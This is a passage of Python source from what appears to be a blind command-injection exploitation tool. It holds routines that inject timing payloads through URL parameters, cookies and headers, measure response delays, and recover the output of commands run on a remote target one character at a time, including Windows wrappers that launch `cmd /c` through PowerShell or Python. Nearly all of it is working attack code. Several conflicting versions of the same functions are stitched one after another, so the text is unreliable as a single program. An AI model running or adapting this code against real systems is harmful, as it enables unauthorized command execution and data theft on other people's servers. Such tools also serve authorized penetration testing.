        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)
        elif settings.CUSTOM_HEADER_INJECTION:
            how_long = custom_header_injection_test(url, vuln_parameter, payload)
        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
        # Examine time-responses: both thresholds must hold.
        injection_check = False
        if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
            injection_check = True
        if injection_check == True:
            if output_length > 1:
                if menu.options.verbose:
                    print "\n"
                else:
                    sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
                    sys.stdout.flush()
                print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL
            found_chars = True
            injection_check = False
            break
    # Proceed with the next (injection) step!
    if found_chars == True:
        # Exclusive bound for the position loop below (which reuses the name).
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()
        if settings.TARGET_OS == "win":
            cmd = previous_cmd
        output = []
        percent = "0.0"
        sys.stdout.write("\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " + str(percent) + "% ]")
        sys.stdout.flush()
        # Step two: per position, try each candidate code until one delays.
        for num_of_chars in range(1, int(num_of_chars)):
            # Candidate order: upper-case first for the first position,
            # lower-case first afterwards.  The ranges are half-open, so 'Z'
            # (90) and 'z' (122) are picked up by the trailing ranges below;
            # together they cover codes 32..126 exactly once.
            if num_of_chars == 1:
                char_pool = range(65, 90) + range(96, 122)
            else:
                char_pool = range(96, 122) + range(65, 90)
            char_pool = char_pool + range(48, 57) + range(32, 48) + range(90, 96) + range(57, 65) + range(122, 127)
            for ascii_char in char_pool:
                if alter_shell:
                    # Get the execution output, of shell execution.
                    payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
                else:
                    # Get the execution output, of shell execution.
                    payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)
                if menu.options.base64:
                    payload = base64.b64encode(payload)
                # Echo the payload when "--verbose" is set.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL)
                # Same injection-point dispatch as in step one.
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)
                elif settings.CUSTOM_HEADER_INJECTION:
                    how_long = custom_header_injection_test(url, vuln_parameter, payload)
                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
                # Examine time-responses: both thresholds must hold.
                injection_check = False
                if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF):
                    injection_check = True
                if injection_check == True:
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        # `percent` is integer division under the Python 2 this
                        # file targets (print statements) and is not displayed;
                        # the float form below drives the progress bar.
                        percent = ((num_of_chars * 100) / output_length)
                        float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))
                        sys.stdout.write("\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " + str(float_percent) + "% ]")
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    injection_check = False
                    break
        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)
        # Check for empty output (nothing at all, or only spaces).
        if output == (len(output) * " "):
            output = ""
    else:
        check_start = 0
        if not menu.options.verbose:
            sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
            sys.stdout.flush()
        else:
            print ""
        check_how_long = 0
        # False (not "") signals that no length was detected at all.
        output = False
    return check_how_long, output
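def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename):
  """
  Recover the output of `cmd` over a time-based (blind) command injection.

  Phase 1 probes the length of the command output: for each candidate
  length a payload is sent that makes the target sleep when the length
  matches, and a response time of at least `delay` seconds counts as a hit.
  Phase 2 then recovers the output one position at a time by trying every
  value in the ASCII range 32..128 against the same timing oracle; the first
  value that produces a hit is taken for that position.

  Parameters:
    separator, prefix, suffix: injection-string pieces handed to the payload
      builders and the `parameters` helpers.
    maxlen: exclusive upper bound of the output-length search.
    TAG, filename: accepted for interface compatibility; not used here.
    cmd: command to execute on the vulnerable host.
    delay: sleep time (seconds) that marks a positive response.
    http_request_method, url, vuln_parameter: request details forwarded to
      the injection-test helpers.
    alter_shell: select the "alter shell" payload variants.

  Returns:
    (seconds_spent, output) where `output` is the recovered string ("" when
    it consisted only of spaces), or (0, False) when no length was detected.
  """
  # An empty result is only acceptable for file-write / file-upload runs.
  if menu.options.file_write or menu.options.file_upload:
    minlen = 0
  else:
    minlen = 1

  def finalize_payload(payload):
    # Shared post-processing: wrap with prefix/suffix, optionally base64 it,
    # and echo it under --verbose.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    if menu.options.base64:
      payload = base64.b64encode(payload)
    if menu.options.verbose:
      sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
    return payload

  def measure(payload):
    # Send the payload through the vector that carries the INJECT_HERE tag
    # (header vectors take precedence over the plain parameter request) and
    # return the observed response time.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      return cookie_injection_test(url, vuln_parameter, payload)
    if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      return user_agent_injection_test(url, vuln_parameter, payload)
    if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      return referer_injection_test(url, vuln_parameter, payload)
    return examine_requests(payload, vuln_parameter, http_request_method, url)

  # Phase 1: output length.
  found_chars = False
  sys.stdout.write("(*) Retrieving the length of execution output... ")
  sys.stdout.flush()
  for output_length in range(int(minlen), int(maxlen)):
    if alter_shell:
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
    else:
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
    if measure(finalize_payload(payload)) >= delay:
      # Lengths 0 and 1 are accepted silently (no SUCCEED line is printed).
      if output_length > 1:
        if menu.options.verbose:
          print("\n")
        else:
          sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
          sys.stdout.flush()
        print(Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL)
      found_chars = True
      break

  if not found_chars:
    if menu.options.verbose:
      print("")
    else:
      sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
      sys.stdout.flush()
    return 0, False

  # Phase 2: one character per position.
  check_start = time.time()
  output = []
  sys.stdout.write("\r(*) Grabbing the output, please wait... [ 0% ]")
  sys.stdout.flush()
  for num_of_chars in range(1, output_length + 1):
    for ascii_char in range(32, 129):
      if alter_shell:
        payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
      else:
        payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
      if measure(finalize_payload(payload)) >= delay:
        output.append(chr(ascii_char))
        if not menu.options.verbose:
          float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))
          sys.stdout.write("\r(*) Grabbing the output, please wait... [ " + str(float_percent) + "% ]")
          sys.stdout.flush()
        # First matching value wins; move on to the next position.
        break
  check_how_long = int(time.time() - check_start)
  output = "".join(output)
  # A result made only of spaces is reported as empty.
  if output == len(output) * " ":
    output = ""
  return check_how_long, output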
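def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response):
  """
  Re-validate a time-based finding against a result the caller already knows.

  A slow response can have causes other than the injected sleep, so the
  detection is replayed with `cmd`, whose real result is `randvcalc`: the
  output length is probed first (1 or 2), then the value is read back through
  the timing oracle. Only an exact match with `randvcalc` confirms the finding.

  Parameters:
    separator, prefix, suffix: injection-string pieces for the payload builders.
    TAG: accepted for interface compatibility; unused here.
    cmd: command whose output is expected to equal `randvcalc`.
    delay: sleep time (seconds) requested by the payloads.
    http_request_method, url, vuln_parameter, url_time_response: request
      details forwarded to the injection-test helpers.
    randvcalc: the expected result.
    alter_shell: select the "alter shell" payload variants.
    how_long: response time of the original finding; it is replaced by the
      last time measured here and returned on success.

  Returns:
    (how_long, output) when the recovered output equals `randvcalc`;
    None otherwise (no length detected, or a mismatch, i.e. a false positive).
  """
  def finalize_payload(payload):
    # Shared post-processing: wrap, optionally base64, echo under --verbose.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    if menu.options.base64:
      payload = base64.b64encode(payload)
    if menu.options.verbose:
      sys.stdout.write("\n" + settings.print_payload(payload.replace("\n", "\\n")))
    return payload

  def measure(payload):
    # Send through the vector carrying the INJECT_HERE tag and return the
    # observed response time.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      return cookie_injection_test(url, vuln_parameter, payload)
    if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      return user_agent_injection_test(url, vuln_parameter, payload)
    if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      return referer_injection_test(url, vuln_parameter, payload)
    if settings.CUSTOM_HEADER_INJECTION:
      return custom_header_injection_test(url, vuln_parameter, payload)
    return examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)

  def is_hit(seconds):
    # Positive only if above the absolute threshold AND at least FOUND_DIFF
    # seconds slower than the requested sleep.
    return (seconds >= settings.FOUND_HOW_LONG) and (seconds - delay >= settings.FOUND_DIFF)

  if menu.options.verbose:
    sys.stdout.write(settings.print_info_msg("Testing the reliability of used payload... "))
    sys.stdout.flush()

  # Phase 1: the expected value is at most two characters long.
  found_chars = False
  for output_length in range(1, 3):
    if alter_shell:
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
    else:
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
    how_long = measure(finalize_payload(payload))
    if is_hit(how_long):
      found_chars = True
      break
  if not found_chars:
    return None

  # Phase 2: read the value back; only the candidates 1 and 2 are tried
  # at each position, the first hit is kept.
  sys.stdout.flush()
  output = []
  for num_of_chars in range(1, output_length + 1):
    for ascii_char in range(1, 3):
      if alter_shell:
        payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
      else:
        payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
      how_long = measure(finalize_payload(payload))
      if is_hit(how_long):
        output.append(ascii_char)
        break
  output = "".join(str(p) for p in output)
  if str(output) == str(randvcalc):
    return how_long, output
  return None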
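def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response):
  """
  Re-validate a time-based finding against a result the caller already knows.

  A slow response can have causes other than the injected sleep, so the
  detection is replayed with a freshly randomised sleep: the output length
  of `cmd` is probed first (1 or 2), then the value is read back through the
  timing oracle and compared with `randvcalc`. Only an exact match confirms
  the finding.

  Parameters:
    separator, prefix, suffix, whitespace: injection-string pieces; every
      space of the finished payload is replaced by `whitespace`.
    TAG: accepted for interface compatibility; unused here.
    cmd: command whose output is expected to equal `randvcalc`.
    timesec: base sleep time (seconds); a random 1-5 s is added for this run.
    http_request_method, url, vuln_parameter, url_time_response: request
      details forwarded to the injection-test helpers.
    randvcalc: the expected result.
    alter_shell: select the "alter shell" payload variants.
    how_long: response time of the original finding; it is replaced by the
      last time measured here and returned on success.

  Returns:
    (how_long, output) when the recovered value equals `randvcalc`;
    None otherwise (no length detected, or a mismatch, i.e. a false positive).
  """
  if settings.TARGET_OS == "win":
    # On Windows the length probe wraps the command so that it prints the
    # length of its own output; the unwrapped command is restored for phase 2.
    # NOTE(review): `cmd` is spliced in unquoted - a command containing quotes
    # or parentheses will break this wrapper.
    previous_cmd = cmd
    if alter_shell:
      cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
    else:
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"

  info_msg = "Checking the reliability of the used payload in case of a false positive result... "
  if settings.VERBOSITY_LEVEL == 1:
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
  elif settings.VERBOSITY_LEVEL > 1:
    print(settings.print_info_msg(info_msg))

  # Vary the sleep so this run does not simply repeat the timing that
  # produced the original finding.
  timesec = timesec + random.randint(1, 5)

  def finalize_payload(payload):
    # Shared post-processing: wrap, substitute whitespace, apply the global
    # payload modifications and echo according to the verbosity level.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    payload = payload.replace(" ", whitespace)
    payload = checks.perform_payload_modification(payload)
    if settings.VERBOSITY_LEVEL == 1:
      sys.stdout.write("\n" + settings.print_payload(payload.replace("\n", "\\n")))
    elif settings.VERBOSITY_LEVEL > 1:
      print(settings.print_info_msg("Generating a payload for testing the reliability of used payload..."))
      sys.stdout.write(settings.print_payload(payload.replace("\n", "\\n")) + "\n")
    return payload

  def measure(payload):
    # Send through the vector carrying the INJECT_HERE tag and return the
    # observed response time.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      return cookie_injection_test(url, vuln_parameter, payload)
    if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      return user_agent_injection_test(url, vuln_parameter, payload)
    if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      return referer_injection_test(url, vuln_parameter, payload)
    if menu.options.host and settings.INJECT_TAG in menu.options.host:
      return host_injection_test(url, vuln_parameter, payload)
    if settings.CUSTOM_HEADER_INJECTION:
      return custom_header_injection_test(url, vuln_parameter, payload)
    return examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)

  def is_hit(seconds):
    # Positive only if above the absolute threshold AND at least FOUND_DIFF
    # seconds slower than the (randomised) requested sleep.
    return (seconds >= settings.FOUND_HOW_LONG) and (seconds - timesec >= settings.FOUND_DIFF)

  # Phase 1: the expected value is at most two characters long.
  found_chars = False
  for output_length in range(1, 3):
    if alter_shell:
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
    else:
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)
    how_long = measure(finalize_payload(payload))
    if is_hit(how_long):
      found_chars = True
      break
  if not found_chars:
    return None

  # Phase 2: read the value back with the original (unwrapped) command.
  if settings.TARGET_OS == "win":
    cmd = previous_cmd
  sys.stdout.flush()
  output = []
  for num_of_chars in range(1, output_length + 1):
    matched = False
    for ascii_char in range(1, 20):
      if alter_shell:
        payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
      else:
        payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
      how_long = measure(finalize_payload(payload))
      if is_hit(how_long):
        output.append(ascii_char)
        matched = True
        break
    # The first hit settles the value; later positions are not probed.
    if matched:
      break
  output = "".join(str(p) for p in output)
  if str(output) == str(randvcalc):
    if settings.VERBOSITY_LEVEL == 1:
      print("")
    return how_long, output
  return None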
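def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response):
  """
  Recover the output of `cmd` over a time-based (blind) command injection.

  Phase 1 probes the length of the command output: a response that is both
  above `settings.FOUND_HOW_LONG` and at least `settings.FOUND_DIFF` seconds
  slower than `timesec` counts as a hit. Phase 2 then recovers the output one
  position at a time, trying the candidates from `checks.generate_char_pool`
  and keeping the first that produces a hit.

  Parameters:
    separator, prefix, suffix, whitespace: injection-string pieces; every
      space of the finished payload is replaced by `whitespace`.
    maxlen: exclusive upper bound of the output-length search.
    TAG, filename: accepted for interface compatibility; not used here.
    cmd: command to execute on the vulnerable host.
    timesec: sleep time (seconds) requested by the payloads.
    http_request_method, url, vuln_parameter, url_time_response: request
      details forwarded to the injection-test helpers.
    alter_shell: select the "alter shell" payload variants.

  Returns:
    (seconds_spent, output) where `output` is the recovered string ("" when
    it consisted only of spaces), or (0, False) when no length was detected.
  """
  if settings.TARGET_OS == "win":
    # On Windows the length probe wraps the command so that it prints the
    # length of its own output; the unwrapped command is restored for phase 2.
    # NOTE(review): `cmd` is spliced in unquoted - a command containing quotes
    # or parentheses will break this wrapper.
    previous_cmd = cmd
    if alter_shell:
      cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
    else:
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"

  # An empty result is only acceptable for file-write / file-upload runs.
  if menu.options.file_write or menu.options.file_upload:
    minlen = 0
  else:
    minlen = 1

  def finalize_payload(payload):
    # Shared post-processing: wrap, substitute whitespace, apply the global
    # payload modifications and echo according to the verbosity level.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    payload = payload.replace(" ", whitespace)
    payload = checks.perform_payload_modification(payload)
    if settings.VERBOSITY_LEVEL == 1:
      sys.stdout.write("\n" + settings.print_payload(payload.replace("\n", "\\n")))
    elif settings.VERBOSITY_LEVEL > 1:
      print(settings.print_info_msg("Generating a payload for injection..."))
      sys.stdout.write(settings.print_payload(payload.replace("\n", "\\n")) + "\n")
    return payload

  def measure(payload):
    # Send through the vector carrying the INJECT_HERE tag and return the
    # observed response time.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      return cookie_injection_test(url, vuln_parameter, payload)
    if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      return user_agent_injection_test(url, vuln_parameter, payload)
    if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      return referer_injection_test(url, vuln_parameter, payload)
    if menu.options.host and settings.INJECT_TAG in menu.options.host:
      return host_injection_test(url, vuln_parameter, payload)
    if settings.CUSTOM_HEADER_INJECTION:
      return custom_header_injection_test(url, vuln_parameter, payload)
    return examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)

  def is_hit(seconds):
    # Positive only if above the absolute threshold AND at least FOUND_DIFF
    # seconds slower than the requested sleep.
    return (seconds >= settings.FOUND_HOW_LONG) and (seconds - timesec >= settings.FOUND_DIFF)

  # Phase 1: output length.
  sys.stdout.write(settings.print_info_msg("Retrieving the length of execution output... "))
  sys.stdout.flush()
  if settings.VERBOSITY_LEVEL > 1:
    print("")
  found_chars = False
  for output_length in range(int(minlen), int(maxlen)):
    if alter_shell:
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
    else:
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)
    if is_hit(measure(finalize_payload(payload))):
      # Lengths 0 and 1 are accepted silently (no "Retrieved" line).
      if output_length > 1:
        if settings.VERBOSITY_LEVEL < 1:
          sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
          sys.stdout.flush()
        if settings.VERBOSITY_LEVEL == 1:
          print("")
        print(settings.print_info_msg("Retrieved: " + str(output_length)))
      found_chars = True
      break

  if not found_chars:
    if settings.VERBOSITY_LEVEL < 1:
      sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]")
      sys.stdout.flush()
    else:
      print("")
    check_how_long = 0
    output = False
  else:
    # Phase 2: one character per position, with the unwrapped command.
    if settings.TARGET_OS == "win":
      cmd = previous_cmd
    check_start = time.time()
    output = []
    info_msg = "Presuming the execution output, please wait... "
    # NOTE(review): this keys on menu.options.verbose while the rest of the
    # function uses settings.VERBOSITY_LEVEL - presumably the same value.
    if menu.options.verbose < 1:
      info_msg += "[ 0.0% ]"
    elif menu.options.verbose > 1:
      info_msg += "\n"
    sys.stdout.write("\r" + settings.print_info_msg(info_msg))
    sys.stdout.flush()
    for num_of_chars in range(1, output_length + 1):
      for ascii_char in checks.generate_char_pool(num_of_chars):
        if alter_shell:
          payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
        else:
          payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
        if is_hit(measure(finalize_payload(payload))):
          output.append(chr(ascii_char))
          if settings.VERBOSITY_LEVEL < 1:
            # The last position reports SUCCEED instead of 100.0%.
            if num_of_chars == output_length:
              float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
            else:
              float_percent = str("{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))) + "%"
            sys.stdout.write("\r" + settings.print_info_msg("Presuming the execution output, please wait... [ " + float_percent + " ]"))
            sys.stdout.flush()
          # First matching value wins; move on to the next position.
          break
    check_how_long = int(time.time() - check_start)
    output = "".join(output)
    # A result made only of spaces is reported as empty.
    if output == len(output) * " ":
      output = ""

  if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session:
    print("")
  return check_how_long, output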
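def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long):
  """
  Re-validate a time-based finding against a result the caller already knows.

  The detection is replayed with `cmd`, whose real result is `randvcalc`:
  the output length is probed first (1 or 2), then the value is read back
  through the timing oracle. A probe counts as a hit only if its response
  time is at least `delay` AND equals the reference time exactly - the
  caller's `how_long` in phase 1, the time that confirmed the length in
  phase 2. Only an exact match with `randvcalc` confirms the finding.

  Parameters:
    separator, prefix, suffix: injection-string pieces for the payload builders.
    TAG: accepted for interface compatibility; unused here.
    cmd: command whose output is expected to equal `randvcalc`.
    delay: sleep time (seconds) requested by the payloads.
    http_request_method, url, vuln_parameter: request details forwarded to
      the injection-test helpers.
    randvcalc: the expected result.
    alter_shell: select the "alter shell" payload variants.
    how_long: response time of the original finding; it is replaced by the
      last time measured here and returned on success.

  Returns:
    (how_long, output) when the recovered output equals `randvcalc`;
    None otherwise (no length detected, or a mismatch, i.e. a false positive).
  """
  # Reference time every probe has to reproduce exactly.
  previous_how_long = how_long

  def finalize_payload(payload):
    # Shared post-processing: wrap, optionally base64, echo under --verbose.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)
    if menu.options.base64:
      payload = base64.b64encode(payload)
    if menu.options.verbose:
      sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
    return payload

  def measure(payload):
    # Send through the vector carrying the INJECT_HERE tag and return the
    # observed response time.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      return cookie_injection_test(url, vuln_parameter, payload)
    if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      return user_agent_injection_test(url, vuln_parameter, payload)
    if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      return referer_injection_test(url, vuln_parameter, payload)
    return examine_requests(payload, vuln_parameter, http_request_method, url)

  def is_hit(seconds):
    # Exact-equality check against the current reference time.
    return (previous_how_long == seconds) and (seconds >= delay)

  if menu.options.verbose:
    sys.stdout.write("\n(*) Testing the reliability of used payload... ")
    sys.stdout.flush()

  # Phase 1: the expected value is at most two characters long.
  found_chars = False
  for output_length in range(1, 3):
    if alter_shell:
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
    else:
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
    how_long = measure(finalize_payload(payload))
    if is_hit(how_long):
      found_chars = True
      break
  if not found_chars:
    return None

  # Phase 2: the reference becomes the time that confirmed the length.
  previous_how_long = how_long
  sys.stdout.flush()
  output = []
  for num_of_chars in range(1, output_length + 1):
    # Only the candidates 1 and 2 are tried per position; the first hit is kept.
    for ascii_char in range(1, 3):
      if alter_shell:
        payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
      else:
        payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
      how_long = measure(finalize_payload(payload))
      if is_hit(how_long):
        output.append(ascii_char)
        break
  output = "".join(str(p) for p in output)
  if str(output) == str(randvcalc):
    return how_long, output
  return None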
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename):
  """
  Pull the output of `cmd` back over a time-based (blind) command injection.

  Step one finds how long the output is (a response time of at least `delay`
  seconds is a hit); step two reads it back one position at a time, trying
  ASCII values 32..128 in order and keeping the first one that is a hit.

  Parameters:
    separator, prefix, suffix: injection-string pieces for the payload
      builders and the `parameters` helpers.
    maxlen: exclusive upper bound of the length search.
    TAG, filename: kept for interface compatibility; unused.
    cmd: command to run on the target.
    delay: sleep (seconds) that identifies a positive response.
    http_request_method, url, vuln_parameter: request details for the
      injection-test helpers.
    alter_shell: use the "alter shell" payload builders.

  Returns:
    (seconds_spent, output) - `output` is "" if it was all spaces -
    or (0, False) when no length could be established.
  """
  def send(raw):
    # Finish the payload (prefix/suffix, optional base64, verbose echo) and
    # fire it through whichever vector carries the INJECT_HERE tag,
    # returning the measured response time.
    ready = parameters.suffixes(parameters.prefixes(raw, prefix), suffix)
    if menu.options.base64:
      ready = base64.b64encode(ready)
    if menu.options.verbose:
      sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + ready.replace("\n", "\\n") + Style.RESET_ALL)
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      return cookie_injection_test(url, vuln_parameter, ready)
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      return user_agent_injection_test(url, vuln_parameter, ready)
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      return referer_injection_test(url, vuln_parameter, ready)
    return examine_requests(ready, vuln_parameter, http_request_method, url)

  length_payload = tb_payloads.cmd_execution_alter_shell if alter_shell else tb_payloads.cmd_execution
  char_payload = tb_payloads.get_char_alter_shell if alter_shell else tb_payloads.get_char

  # Zero-length output is only a valid answer for file write / upload runs.
  lowest = 0 if (menu.options.file_write or menu.options.file_upload) else 1

  sys.stdout.write("(*) Retrieving the length of execution output... ")
  sys.stdout.flush()
  detected_length = None
  for candidate in range(int(lowest), int(maxlen)):
    if send(length_payload(separator, cmd, candidate, delay, http_request_method)) >= delay:
      detected_length = candidate
      break

  if detected_length is None:
    if menu.options.verbose:
      print("")
    else:
      sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
      sys.stdout.flush()
    return 0, False

  # Lengths 0 and 1 are accepted without a SUCCEED line.
  if detected_length > 1:
    if menu.options.verbose:
      print("\n")
    else:
      sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
      sys.stdout.flush()
    print(Style.BRIGHT + "(!) Retrieved " + str(detected_length) + " characters." + Style.RESET_ALL)

  started = time.time()
  sys.stdout.write("\r(*) Grabbing the output, please wait... [ 0% ]")
  sys.stdout.flush()
  recovered = []
  for position in range(1, detected_length + 1):
    for code in range(32, 129):
      if send(char_payload(separator, cmd, position, code, delay, http_request_method)) >= delay:
        recovered.append(chr(code))
        if not menu.options.verbose:
          progress = "{0:.1f}".format(round(((position * 100) / (detected_length * 1.0)), 2))
          sys.stdout.write("\r(*) Grabbing the output, please wait... [ " + str(progress) + "% ]")
          sys.stdout.flush()
        break
  elapsed = int(time.time() - started)
  text = "".join(recovered)
  # Whitespace-only output is reported as empty.
  if text == len(text) * " ":
    text = ""
  return elapsed, text